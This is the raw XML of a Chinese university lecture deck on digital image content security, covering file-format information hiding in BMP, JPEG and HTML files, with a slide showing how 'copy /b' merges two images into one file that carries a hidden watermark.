                <a:xfrm>
                  <a:off x="2107" y="0"/>
                  <a:ext cx="139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1" name="Group 17"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="384"/>
                <a:ext cx="885" cy="384"/>
                <a:chOff x="0" y="384"/>
                <a:chExt cx="885" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9265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799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外观（无变化）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66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88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2" name="Group 20"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="885" y="384"/>
                <a:ext cx="1222" cy="384"/>
                <a:chOff x="885" y="384"/>
                <a:chExt cx="1222" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9263" name="Rectangle 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="928" y="384"/>
                  <a:ext cx="1136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64" name="Rectangle 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="885" y="384"/>
                  <a:ext cx="122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3" name="Group 23"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2107" y="384"/>
                <a:ext cx="1390" cy="384"/>
                <a:chOff x="2107" y="384"/>
                <a:chExt cx="1390" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9261" name="Rectangle 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2150" y="384"/>
                  <a:ext cx="130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62" name="Rectangle 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2107" y="384"/>
                  <a:ext cx="139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4" name="Group 26"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="768"/>
                <a:ext cx="885" cy="384"/>
                <a:chOff x="0" y="768"/>
                <a:chExt cx="885" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9259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799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文件大小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60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88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5" name="Group 29"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="885" y="768"/>
                <a:ext cx="1222" cy="384"/>
                <a:chOff x="885" y="768"/>
                <a:chExt cx="1222" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9257" name="Rectangle 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="928" y="768"/>
                  <a:ext cx="1136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263,222字节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58" name="Rectangle 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="885" y="768"/>
                  <a:ext cx="122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6" name="Group 32"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2107" y="768"/>
                <a:ext cx="1390" cy="384"/>
                <a:chOff x="2107" y="768"/>
                <a:chExt cx="1390" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9255" name="Rectangle 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2150" y="768"/>
                  <a:ext cx="130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483,382字节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56" name="Rectangle 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2107" y="768"/>
                  <a:ext cx="139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7" name="Group 35"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="1152"/>
                <a:ext cx="885" cy="384"/>
                <a:chOff x="0" y="1152"/>
                <a:chExt cx="885" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9253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799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文件头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54" name="Rectangle 37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88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8" name="Group 38"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="885" y="1152"/>
                <a:ext cx="1222" cy="384"/>
                <a:chOff x="885" y="1152"/>
                <a:chExt cx="1222" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9251" name="Rectangle 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="928" y="1152"/>
                  <a:ext cx="1136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 dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>文件长度域值为0</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>X40436</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="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9252" name="Rectangle 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="885" y="1152"/>
                  <a:ext cx="122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9" name="Group 41"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2107" y="1152"/>
                <a:ext cx="1390" cy="384"/>
                <a:chOff x="2107" y="1152"/>
                <a:chExt cx="1390" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9249" name="Rectangle 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2150" y="1152"/>
                  <a:ext cx="130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 dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>文件长度域值为0</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>X76036</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="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9250" name="Rectangle 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2107" y="1152"/>
                  <a:ext cx="139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40" name="Group 44"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="1536"/>
                <a:ext cx="885" cy="384"/>
                <a:chOff x="0" y="1536"/>
                <a:chExt cx="885" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9247" name="Rectangle 45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799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文件尾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4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88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41" name="Group 47"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="885" y="1536"/>
                <a:ext cx="1222" cy="384"/>
                <a:chOff x="885" y="1536"/>
                <a:chExt cx="1222" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9245" name="Rectangle 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="928" y="1536"/>
                  <a:ext cx="1136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>
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>图像数据后文件结束</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN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246" name="Rectangle 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="885" y="1536"/>
                  <a:ext cx="122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42" name="Group 50"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2107" y="1536"/>
                <a:ext cx="1390" cy="384"/>
                <a:chOff x="2107" y="1536"/>
                <a:chExt cx="1390" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9243" name="Rectangle 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2150" y="1536"/>
                  <a:ext cx="130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1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>图像数据后</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="0000CC"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>增加</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="0000CC"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>Office</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="0000CC"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>文档数据</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US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9244" name="Rectangle 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2107" y="1536"/>
                  <a:ext cx="139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227" name="Rectangle 53"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-3" y="-3"/>
              <a:ext cx="3503" cy="192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18206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文件格式信息隐藏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演示：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内容：命令行实现的格式隐藏。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法：利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令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将两幅图像合并成为一幅图像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>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Baboo.jpg + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Fruits.jpg  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stego.jpg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按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二进制流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>形式合并载体和水印文件为一体，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预览图片时，位于合成图像起始位置的载体图像的显示信息生效，因此合成图像看来与载体图像完全相同，但实际合成图像包含了水印图像。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991401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reen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自定义-华文楷体">
      <a:majorFont>
        <a:latin typeface="Calibri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</Template>
  <TotalTime>16549</TotalTime>
  <Words>5322</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>699</Paragraphs>
  <Slides>72</Slides>
  <Notes>60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4" baseType="lpstr">
      <vt:lpstr>Green</vt:lpstr>
      <vt:lpstr>Equation</vt:lpstr>
      <vt:lpstr>第5章 数字图像内容安全</vt:lpstr>
      <vt:lpstr>图像信息隐藏技术分类</vt:lpstr>
      <vt:lpstr>课程内容</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏</vt:lpstr>
      <vt:lpstr>BMP格式</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏</vt:lpstr>
      <vt:lpstr>BMP图像文件</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏</vt:lpstr>
      <vt:lpstr>在HTML文件中隐藏信息</vt:lpstr>
      <vt:lpstr>在HTML文件中隐藏信息：示例</vt:lpstr>
      <vt:lpstr>在HTML文件中隐藏信息：示例</vt:lpstr>
      <vt:lpstr>在HTML文件中隐藏信息：示例</vt:lpstr>
      <vt:lpstr>在HTML文件中隐藏信息：示例</vt:lpstr>
      <vt:lpstr>在HTML文件中隐藏信息：示例</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏——小结</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏——小结</vt:lpstr>
      <vt:lpstr>文件格式信息隐藏——小结</vt:lpstr>
      <vt:lpstr>课程内容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2.0 时域替换技术</vt:lpstr>
      <vt:lpstr>课程内容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3 变换域算法</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>3 变换域算法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</dc:creator>
  <cp:lastModifiedBy>nuist</cp:lastModifiedBy>
  <cp:revision>1281</cp:revision>
  <cp:lastPrinted>2020-03-30T20:11:55Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-31T06:13:06Z</dcterms:modified>
</cp:coreProperties>
</file>